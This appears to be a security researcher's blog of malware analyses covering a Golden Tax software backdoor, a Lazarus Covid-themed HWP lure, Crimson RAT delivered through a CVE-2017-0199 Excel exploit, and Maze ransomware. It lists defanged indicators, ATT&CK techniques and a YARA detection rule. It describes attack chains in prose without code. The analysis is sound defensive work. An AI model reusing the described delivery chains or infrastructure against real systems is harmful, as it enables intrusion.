GoldenBall — GoldenSpy V2.0

Trustwave researchers recently identified backdoor in Golden Tax Software “Aisino”. There is another Golden Tax software “Baiwang” which also delivers malicious payloads.

Golden Tax Invoicing System (金税开票系统)

There are two official providers of Invoicing Systems in China for the government: Aisino (航天) and Baiwang (百望). All businesses must issue VAT invoices through the Golden Tax system.

Baiwang

In Jan 2019, files uploaded to VirusTotal from China linked to Golden Tax invoice software Baiwang 26e71f1d387298162c1b19e858d001a1(wmiasssrv.dll), 490d17a5b016f3abc14cc57f955b49b3(msorvs571.dat)

Analysis

I tried to extract the samples and analyse. File doesn’t execute in Sandbox Environment. Below are the notable imports of the files.

Notable imports of wmiasssrv.dll
Notable imports of msorvs571.dat

Network connection:

By Analysing the codes, It seems that the malware generates the connecting URL in runtime and downloads subsequent payloads.

VirusTotal search for the filename “taxver.jpg” resulted only one HTML file. The HTML file is downloaded from domain help[.]tax-helper[.]ltd. So there is a high chance that this is the dynamically calculated domain.

Tried to pivot the Domain to check related hashes from RiskIQ.

RiskIQ showing relevant hashes

Resulted in 4 other hashes:

0ed0ef98f8dc1b8d1b833183d39d3d8c

5e378316e852bef1bdd892d39c0c1ef1

590a9da3e5a67b8ca9f823f39021f5e8

7a7ef986808ebb7781f5d64da9d7900c

Connecting the dots

All the 4 hashes were DLL files with same Imphash. Moreover the code genes has some match with FireBall Malware.

In June 2017, Checkpoint uncovered Fireball operation run by Chinese digital marketing agency. The Fireball malware acts as a browser-hijacker but and can be turned into a full-functioning malware downloader. Fireball is capable of executing any code on the victim machines, resulting in a wide range of actions from stealing credentials to dropping additional malware.

IoCs

  • 26e71f1d387298162c1b19e858d001a1
  • 490d17a5b016f3abc14cc57f955b49b3
  • 0ed0ef98f8dc1b8d1b833183d39d3d8c
  • 5e378316e852bef1bdd892d39c0c1ef1
  • 590a9da3e5a67b8ca9f823f39021f5e8
  • 7a7ef986808ebb7781f5d64da9d7900c
  • help[.]tax-helper[.]ltd

Reference

https://www.linkedin.com/pulse/china-specific-golden-tax-%E9%87%91%E7%A8%8E-fapiao-%E5%8F%91%E7%A5%A8-samuel-rollet/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

https://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/

Lazarus group leverages Covid themed HWP Document

Lazarus Group, a North Korean nation-state sponsored threat actor serves as an umbrella for several subgroups and has extensive operations as early as 2009.

Lazarus is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions, as well as some of the world’s largest cyber heists. Based on widely publicized operations alone, the group has attempted to steal more than $1.1 billion. Instead of simply obtaining accesses and moving to transfer funds as quickly as possible, Lazarus is believed to operate more similarly to an espionage operation, carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems. 

In a recent campaign, Lazarus if using Covid themed HWP documents targeting South Korea.

One of executables uploaded from SouthKorea to Virustotal repository a matched a yara rule for detecting Reflective Loader. This sample caught my attention since it was Covid themed HWP document and found to be used Lazarus group.

Intelligence Analysis:

With OSINT investigation, found that the executable is downloaded from sofa[.]rs through a HWP document 전라남도 코로나바이러스 대응 긴급 조회.hwp (translation: Urgent inquiry for Coronavirus in Jeollanam-do). Jeollanam-do is a province of South Korea. This may indicate the most probable target is South Korea. 

The code pattern has genes from various known malware including Petya, Trickbot, Gandcrab also contains genes from admin tools like TeamViewer and Dameware. 

Code genes matches

Malware Analysis:

Notable features of executable: 

  • Reads Clipboard data
  • Logs Keystrokes
  • Contains killswitch to choose victims
  • Highly obfuscated file
  • Detects sandbox environment to evade detection 
  • Contains functionality for execution timing, often used to detect debuggers 
  • Contains long sleeps
  • Contains functionality to check if a debugger is running (IsDebuggerPresent)

Embedded Domains:

  • kingsvc[.]cc
  • mbrainingevents[.]com
  • afuocolento[.]it

Process flow:

Process flow

Indicators of Compromise (IoCs):

Domains:

sofa[.]rs

kingsvc[.]cc

mbrainingevents[.]com

afuocolento[.]it

Hash:

8451be72b75a38516e7ba7972729909e

fe2d05365f059d48fd972c79afeee682

186aa05bfe4739274c3c258be4a5a160

IP:

185[.]62[.]56[.]131

Indicators of Attacks (IoAs):

  • Execution: T1047: Windows Management Instrumentation
  • Execution: T1106: Execution through API
  • Persistence: T1138: Application Shimming
  • Privilege Escalation: T1138: Application Shimming 
  • Defense Evasion: T1036: Masquerading 
  • Defense Evasion: T1045: Software Packing
  • Defense Evasion: T1497: Virtualization/Sandbox Evasion
  • Defense Evasion: T1140: Deobfuscate/Decode Files or Information
  • Defense Evasion: T1027: Obfuscated Files or Information
  • Credential Access: T1056: Input Capture 
  • Discovery: T1124: System Time Discovery
  • Discovery: T1497: Virtualization/Sandbox Evasion
  • Discovery: T1057: Process Discovery
  • Discovery: T1087: Account Discovery
  • Discovery: T1033: System Owner/User Discovery 
  • Discovery: T1063: Security Software Discovery
  • Discovery: T1082: System Information Discovery 
  • Lateral Movement: T1105: Remote File Copy
  • Collection: T1056: Input Capture
  • Collection: T1115: Clipboard Data
  • Exfiltration: T1022: Data Encrypted
  • Command and control: T1032: Standard Cryptographic Protocol

Yara Rule:

import “pe”

rule ReflectiveLoader {

   meta:

      description = “Detects a unspecified hack tool, crack or malware using a reflective loader – no hard match – further investigation recommended”

      reference = “Internal Research”

      score = 60

   strings:

      $s1 = “ReflectiveLoader” fullword ascii

      $s2 = “ReflectivLoader.dll” fullword ascii

      $s3 = “?ReflectiveLoader@@” ascii

   condition:

      uint16(0) == 0x5a4d and (

            1 of them or

            pe.exports(“ReflectiveLoader”) or

            pe.exports(“_ReflectiveLoader@4”) or

            pe.exports(“?ReflectiveLoader@@YGKPAX@Z”)

         )

}

Reference: 

  • VirusTotal
  • Intezer Analyze™

Contact:

https://www.linkedin.com/in/dinesh135kumar/

Revive of Crimson RAT

Crimson RAT was previously used by Pakistani Threat Actors Transparent Tribe

Crowdstrike has been tracking the Threat Actor by name MYTHIC LEOPARD since 2016. According to the blog, MYTHIC LEOPARD is Pakistan-based adversary with operations likely located in Karachi. This adversary uses social engineering and spear phishing to target Indian military and defense entities with Crimson RAT. FireEye tracks similar threat actor named APT36 AKA Lapis, Pakistani based Cyber Espionage group that supports Pakistani military and diplomatic interests targeting Indian Military and government with malware named SeedDoor.

There were very few samples uploaded to the public malware repositories from June 2018 to Jan 2020. From mid January, quite a few samples triggered the Yara Rules created to track the operation.

Analysis:

One Such sample that hit the custom Yara rule was 69d4883858b44f0c41ba68493c389885, submitted on Jan 23, 2020 from German IP(Maybe VPN).

The file is malicious Microsoft Office Excel documents that leverage CVE-2017–0199 vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit.

Excel document runs the Base64 Encoded PowerShell Script.

The Decoded PowerShell scripts show the URL contacted to download and executed the Second Stage payload.

The Executable establishes communication through unusual port 2987.

Process flow:

  1. Excel file leverages CVE-2017–0199 vulnerability to run powerShell script.
  2. PowerShell script downloads executable from newsupdates[.]myftp[.]org.
  3. Executable connects to bjorn111[.]duckdns[.]org.
  4. Threat is identified as Crimson RAT (ETPRO TROJAN MSIL/Crimson Receiving Command)

IoAs:

  • Execution: T1203 — Exploitation for Client Execution (CVE-2017–0199)
  • Execution: T1086 — PowerShell
  • Discovery: T1012 — Query Registry
  • Command and Control: T1105 — Remote File Copy
  • Command and Control: T1065 — Uncommonly Used Port (2987)

IoCs:

Hash

  • 6e0ba1b2e72d9a0682d1cdd27eea3980da04582bdef0080bf22f8809d172e229 (Downloader -Excel)
  • d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f (Dropped executable)

Domain

  • newsupdates[.]myftp[.]org
  • bjorn111[.]duckdns[.]org

IP

  • 108[.]62[.]12[.]134
  • 160[.]20[.]147[.]59

The return of the Crimson RAT in malware repositories might be due to some operations observed in the wild using.

Reference:

https://medium.com/@dinu135dk/revive-of-crimson-rat-6b8838920c02

Maze Ransomware Victim’s data revealed

Recently various successful ransomware attacks are observed, of which Maze Ransomware tops the list. Threat Actors behind Maze Ransomware is attributed as TA2101 by Proofpoint and APT-29 by Talosintelligence.The Maze team is publicly exposing victims by displaying real files exfiltrated from their hacked servers. Threat Actors supposed to have registered the domain mazenews[.]top to release the exfiltrated data.

Homepage of mazenews[.]top

Recent incidents:
Over the past several months, Talos Incident Response responded to several such incidents, where an adversary gained access to an environment, deployed ransomware, and exfiltrated large amounts of data, combining elements of ransomware and doxxing attacks into a single incident.

In one incident, the attacker leveraged CobaltStrike after obtaining access to the network. CobaltStrike is a widely used framework for offensive and red-teaming, which is also commonly used by adversaries to attack their targets. Once the adversary has access, they spend at least a week laterally moving around the network and gathering systems and data along the way. Combined with CobaltStrike, the actor used a technique commonly associated with APT-29, leveraging a named pipe.

Victims List:

On December 11, the group behind the Maze ransomware established a website where victims who refused to pay the ransom were shamed and leaked victim information stolen by the group was exposed.

This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space, as demonstrated by the proliferation of emotet and the millions and millions of dollars in damage that have followed. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised.

Indicators of Compromise (IoCs):
HASHES:

CobaltStrike

  • 51461b83f3b8afbcae46145be60f7ff11b5609f1a2341283ad49c03121e6cafe
  • 3627eb2e1940e50ab2e7b3ee703bc5f8663233fe71a872b32178cb118fb3e2d9

Maze Ransomware

  • 04e22ab46a8d5dc5fea6c41ea6fdc913b793a4e33df8f0bc1868b72b180c0e6e
  • 067f1b8f1e0b2bfe286f5169e17834e8cf7f4266b8d97f28ea78995dc81b0e7b
  • 1161b030293e58d15b6a6a814a61a6432cf2c98ce9d156986157b432f3ebcf78
  • 153defee225de889d2ac66605f391f4aeaa8b867b4093c686941e64d0d245a57
  • 195ef8cfabc2e877ebb1a60a19850c714fb0a477592b0a8d61d88f0f96be5de9
  • 30b72e83d66cbe9e724c8e2b21179aecd4bcf68b2ec7895616807df380afab54
  • 33afa2f1d53d5279b6fc87ce6834193fdd7e16e4b44e895aae4b9da00be0c502
  • 4080402553e9a86e954c1d9b7d0bb059786f52aba4a179a5d00e219500c8f43d
  • 5603a16cbf81d183d3ff4ffea5477af1a4be01321865f0978c0e128051ec0a82
  • 58fe9776f33628fd965d1bcc442ec8dc5bfae0c648dcaec400f6090633484806
  • 5c9b7224ffd2029b6ce7b82ea40d63b9d4e4f502169bc91de88b4ea577f52353
  • 6878f7bd90434ac5a76ac2208a5198ce1a60ae20e8505fc110bd8e42b3657d13
  • 6a22220c0fe5f578da11ce22945b63d93172b75452996defdc2ff48756bde6af 
  • 822a264191230f753546407a823c6993e1a83a83a75fa36071a874318893afb8
  • 83f8ce81f71d6f0b1ddc6b4f3add7a5deef8367a29f59b564c9539d6653d1279
  • 877c439da147bab8e2c32f03814e3973c22cbcd112d35bc2735b803ac9113da1
  • 91514e6be3f581a77daa79e2a4905dcbdf6bdcc32ee0f713599a94d453a26fc1
  • 9751ae55b105ad8ffe6fc5dc7aea60ad723b6df67a959aa2ea6f4fa640d20a71
  • 9ad15385f04a6d8dd58b4390e32d876070e339eee6b8da586852d7467514d1b1
  • 9be70b7fe15cd64aed5b1adc88c2d5270bce534d167c4a42d143ae0059c3da1c
  • b30bb0f35a904f67d3ac0082c59770836cc415dc5b7225be04e8d7c79bde73be 
  • c040defb9c90074b489857f328d3e0040ac0ddab26cde132f17cccae7f1309cc 
  • c11b964916457579a268a36e825857866680baf1830cd6e2d26d4e1e24dec91b 
  • ea19736c8e89e871974aabdc0d52ad0f0948159d4cf41d2889f49448cbe5e705 
  • ecd04ebbb3df053ce4efa2b73912fd4d086d1720f9b410235ee9c1e529ea52a2 
  • F491fb72f106e879021b0bb1149c4678fb380c255d2ef11ac4e0897378793f49 
  • fc611f9d09f645f31c4a77a27b6e6b1aec74db916d0712bef5bce052d12c971f

IP ADDRESSES:

  • 91.218.114[.]4
  • 5.199.167[.]188
  • 185.147.15[.]22

References:

Contact: https://www.linkedin.com/in/dinesh135kumar/

Design a site like this with WordPress.com
Get started